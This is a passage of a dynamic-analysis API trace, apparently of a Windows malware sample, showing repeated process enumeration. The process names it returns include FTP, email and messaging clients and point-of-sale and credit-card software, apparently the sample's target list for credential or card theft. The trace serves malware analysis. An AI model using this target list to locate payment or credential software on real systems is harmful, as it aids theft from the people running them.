th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="hang around rise.exe")) returned 1 [0215.354] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="kill.exe")) returned 1 [0215.355] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="disease_victim_can.exe")) returned 1 [0215.357] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="decideenergytend.exe")) returned 1 [0215.359] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x110c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0215.360] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0215.362] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0215.364] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0215.366] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0215.368] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0215.370] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0215.372] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1158, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0215.374] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1168, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0215.376] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0215.395] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0215.397] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0215.399] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0215.401] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0215.403] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0215.406] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0215.408] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0215.410] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0215.412] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0215.414] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0215.416] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0215.418] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0215.420] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0215.422] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0215.424] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0215.426] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x121c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0215.480] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0215.510] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0215.512] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1238, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0215.514] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0215.516] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0215.518] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0215.520] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0215.522] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1260, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0215.524] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1268, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0215.526] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0215.528] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0215.530] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0215.532] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0215.534] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x129c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="begin.exe")) returned 1 [0215.539] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0215.542] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0215.544] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0215.584] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="weapon.exe")) returned 1 [0215.586] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0215.588] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x3a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0215.590] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x464, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0215.591] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0215.593] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0215.595] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x25c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="bcatcih")) returned 1 [0215.597] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0215.599] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0215.601] CloseHandle (hObject=0x2138) returned 1 [0215.601] Sleep (dwMilliseconds=0x64) [0215.704] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2198 [0215.719] Process32First (in: hSnapshot=0x2198, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0215.720] Process32Next (in: hSnapshot=0x2198, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x76, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0215.722] Process32Next (in: hSnapshot=0x2198, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0215.724] Process32Next (in: hSnapshot=0x2198, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0215.726] Process32Next (in: hSnapshot=0x2198, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0215.727] Process32Next (in: hSnapshot=0x2198, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0215.729] Process32Next (in: hSnapshot=0x2198, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0215.731] Process32Next (in: hSnapshot=0x2198, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0215.733] Process32Next (in: hSnapshot=0x2198, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0215.734] Process32Next (in: hSnapshot=0x2198, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0215.736] Process32Next (in: hSnapshot=0x2198, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0215.738] Process32Next (in: hSnapshot=0x2198, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0215.740] Process32Next (in: hSnapshot=0x2198, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0215.780] Process32Next (in: hSnapshot=0x2198, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0215.785] Process32Next (in: hSnapshot=0x2198, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0215.787] Process32Next (in: hSnapshot=0x2198, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0215.790] Process32Next (in: hSnapshot=0x2198, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0215.792] Process32Next (in: hSnapshot=0x2198, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4a, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0215.794] Process32Next (in: hSnapshot=0x2198, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0215.797] Process32Next (in: hSnapshot=0x2198, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0215.799] Process32Next (in: hSnapshot=0x2198, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0215.802] Process32Next (in: hSnapshot=0x2198, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x35, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0215.804] Process32Next (in: hSnapshot=0x2198, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0215.806] Process32Next (in: hSnapshot=0x2198, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0215.808] Process32Next (in: hSnapshot=0x2198, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0215.810] Process32Next (in: hSnapshot=0x2198, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0215.811] Process32Next (in: hSnapshot=0x2198, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0215.813] Process32Next (in: hSnapshot=0x2198, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0215.817] Process32Next (in: hSnapshot=0x2198, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, 